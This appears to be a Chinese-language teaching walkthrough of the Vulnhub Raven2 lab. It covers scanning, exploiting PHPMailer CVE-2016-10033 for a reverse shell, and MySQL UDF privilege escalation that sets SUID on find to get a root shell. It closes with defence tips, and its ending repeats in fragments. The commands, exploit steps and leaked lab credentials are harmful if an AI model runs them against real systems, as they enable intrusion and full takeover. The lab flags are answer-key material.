Raven2靶场渗透测试教学文档<\/h1>

靶场概述<\/h2>
Raven2是一个基于Vulnhub的渗透测试练习靶场，运行在Linux系统上，包含多个flag和多种漏洞利用方式。本教学文档将详细记录从信息收集到最终提权的完整渗透过程。<\/p>

信息收集阶段<\/h2>

1. 网络扫描<\/h3>

使用以下工具确定目标IP和开放端口：<\/p>

arp-scan<\/code>：扫描本地网络发现目标机器<\/li>

nmap<\/code>：进行端口扫描<\/li>
<\/ul>
发现结果<\/strong>：<\/p>

目标IP：192.168.78.144<\/li>
开放端口：

22 (SSH)<\/li>
80 (HTTP)<\/li>
111 (RPC)<\/li>
<\/ul>
<\/li>
<\/ul>
2. Web目录枚举<\/h3>
访问Web服务并枚举目录：<\/p>

发现\/vendor\/<\/code>目录

在path<\/code>文件中找到flag1<\/strong>：a2c1f66d2b8051bd3a5874b5b6e43e21<\/code><\/li>
<\/ul>
<\/li>
发现readme.md<\/code>文件，揭示网站使用PHPMailer<\/li>
在version<\/code>文件中确认PHPMailer版本为5.2.16<\/li>
<\/ul>
漏洞利用阶段<\/h2>
1. PHPMailer漏洞利用<\/h3>
PHPMailer 5.2.16存在远程代码执行漏洞(CVE-2016-10033)<\/p>
利用步骤<\/strong>：<\/p>

在Exploit-DB搜索漏洞利用脚本，选择40974.py<\/code><\/li>
修改脚本内容：

设置目标URL<\/li>
设置反弹shell的IP和端口<\/li>
<\/ul>
<\/li>
攻击机开启监听：
nc -lvnp [<\/span>监听端口]<\/span>
<\/span><\/span><\/code><\/pre><\/li>
执行漏洞利用脚本<\/li>
访问生成的shell.php<\/code>文件获取反弹shell<\/li>
<\/ol>
2. 获取初始shell<\/h3>
成功反弹shell后，进行以下操作：<\/p>

升级shell交互性：
python -c 'import pty;pty.spawn("\/bin\/bash")'<\/span>
<\/span><\/span><\/code><\/pre><\/li>
查找flag文件：
find \/ -name flag*
<\/span><\/span><\/code><\/pre>发现flag<\/strong>：

flag2: 6a8ed560f0b5358ecf844108048eb337<\/code><\/li>
flag3: a0f568aa9de277887f37730d71520d9b<\/code><\/li>
<\/ul>
<\/li>
<\/ol>
权限提升阶段<\/h2>
1. 系统信息收集<\/h3>
使用LinEnum.sh脚本扫描系统，发现：<\/p>

MySQL服务以root用户权限运行<\/li>
在WordPress配置文件wp-config.php<\/code>中找到MySQL凭据：

用户名：root<\/li>
密码：R@v3nSecurity<\/li>
<\/ul>
<\/li>
<\/ul>
2. MySQL UDF提权<\/h3>
详细步骤<\/strong>：<\/p>


检查MySQL配置<\/strong>：<\/p>
show<\/span> global<\/span> variables like<\/span> 'secure%'<\/span>;
<\/span><\/span>show<\/span> variables like<\/span> '%plugin%'<\/span>;
<\/span><\/span><\/code><\/pre>
确认plugin目录路径：\/usr\/lib\/mysql\/plugin\/<\/code><\/li>
检查远程登录限制：
use mysql;
<\/span><\/span>select<\/span> user<\/span>,host<\/span> from<\/span> user<\/span>;
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
<\/li>

准备UDF提权文件<\/strong>：<\/p>

使用searchsploit搜索UDF漏洞，选择1518.c<\/code>（适用于MySQL 4.x\/5.x）<\/li>
编译UDF文件：
gcc -g -c 1518.c
<\/span><\/span>gcc -g -shared -o yc.so 1518.o -lc -g
<\/span><\/span><\/code><\/pre>编译选项说明：

-g<\/code>：生成调试信息<\/li>
-c<\/code>：编译为二进制<\/li>
-shared<\/code>：创建动态链接库<\/li>
-o<\/code>：指定输出文件名<\/li>
-lc<\/code>：链接C库<\/li>
<\/ul>
<\/li>
<\/ul>
<\/li>

上传并利用UDF文件<\/strong>：<\/p>

将yc.so<\/code>上传到目标机器（如\/var\/www\/html\/hanh\/<\/code>）<\/li>
通过MySQL操作：
create<\/span> table<\/span> hanh(line blob);
<\/span><\/span>insert<\/span> into<\/span> hanh values<\/span>(load_file('\/var\/www\/html\/hanh\/yc.so'<\/span>));
<\/span><\/span>select<\/span> *<\/span> from<\/span> hanh into<\/span> dumpfile '\/usr\/lib\/mysql\/plugin\/yc.so'<\/span>;
<\/span><\/span>create<\/span> function<\/span> do_system returns<\/span> integer soname 'yc.so'<\/span>;
<\/span><\/span>select<\/span> *<\/span> from<\/span> mysql.func;  -- 验证函数创建
<\/span><\/span><\/span><\/code><\/pre><\/li>
<\/ul>
<\/li>

利用UDF函数提权<\/strong>：<\/p>
select<\/span> do_system('chmod u+s \/usr\/bin\/find'<\/span>);
<\/span><\/span><\/code><\/pre><\/li>

验证SUID权限<\/strong>：<\/p>
find \/ -perm -4000 -type f -exec ls -al {}<\/span> \;<\/span> 2>\/dev\/null
<\/span><\/span><\/code><\/pre>确认\/usr\/bin\/find<\/code>已具有SUID权限<\/p>
<\/li>

最终提权<\/strong>：<\/p>
touch getflag
<\/span><\/span>find getflag -exec '\/bin\/sh'<\/span> \;<\/span>
<\/span><\/span><\/code><\/pre>获取root shell后，在\/root\/flag4.txt<\/code>中找到：<\/p>

flag4: df2bc5e951d91581467bb9a2a8ff4425<\/code><\/li>
<\/ul>
<\/li>
<\/ol>
关键知识点总结<\/h2>


信息收集<\/strong>：<\/p>

网络扫描工具使用<\/li>
Web目录枚举技巧<\/li>
版本信息识别<\/li>
<\/ul>
<\/li>

漏洞利用<\/strong>：<\/p>

PHPMailer RCE漏洞利用<\/li>
反弹shell技术<\/li>
Web shell上传与利用<\/li>
<\/ul>
<\/li>

权限提升<\/strong>：<\/p>

MySQL UDF提权原理<\/li>
SUID权限滥用<\/li>
编译和上传自定义库文件<\/li>
MySQL函数创建与利用<\/li>
<\/ul>
<\/li>

工具使用<\/strong>：<\/p>

arp-scan\/nmap<\/li>
gcc编译<\/li>
LinEnum信息收集脚本<\/li>
searchsploit漏洞搜索<\/li>
<\/ul>
<\/li>
<\/ol>
防御建议<\/h2>

及时更新软件版本（如PHPMailer）<\/li>
限制MySQL运行权限<\/li>
禁用不必要的SUID权限<\/li>
加强文件上传限制<\/li>
使用最小权限原则配置服务账户<\/li>
定期审计系统配置和权限设置<\/li>
<\/ol>

Raven2靶场渗透测试教学文档<\/h1>

靶场概述<\/h2> Raven2是一个基于Vulnhub的渗透测试练习靶场，运行在Linux系统上，包含多个flag和多种漏洞利用方式。本教学文档将详细记录从信息收集到最终提权的完整渗透过程。<\/p>

信息收集阶段<\/h2>

漏洞利用阶段<\/h2>

权限提升阶段<\/h2>

防御建议<\/h2> 及时更新软件版本（如PHPMailer）<\/li> 限制MySQL运行权限<\/li> 禁用不必要的SUID权限<\/li> 加强文件上传限制<\/li> 使用最小权限原则配置服务账户<\/li> 定期审计系统配置和权限设置<\/li> <\/ol>

靶场概述<\/h2>
Raven2是一个基于Vulnhub的渗透测试练习靶场，运行在Linux系统上，包含多个flag和多种漏洞利用方式。本教学文档将详细记录从信息收集到最终提权的完整渗透过程。<\/p>

防御建议<\/h2>

及时更新软件版本（如PHPMailer）<\/li>
限制MySQL运行权限<\/li>
禁用不必要的SUID权限<\/li>
加强文件上传限制<\/li>
使用最小权限原则配置服务账户<\/li>
定期审计系统配置和权限设置<\/li> <\/ol>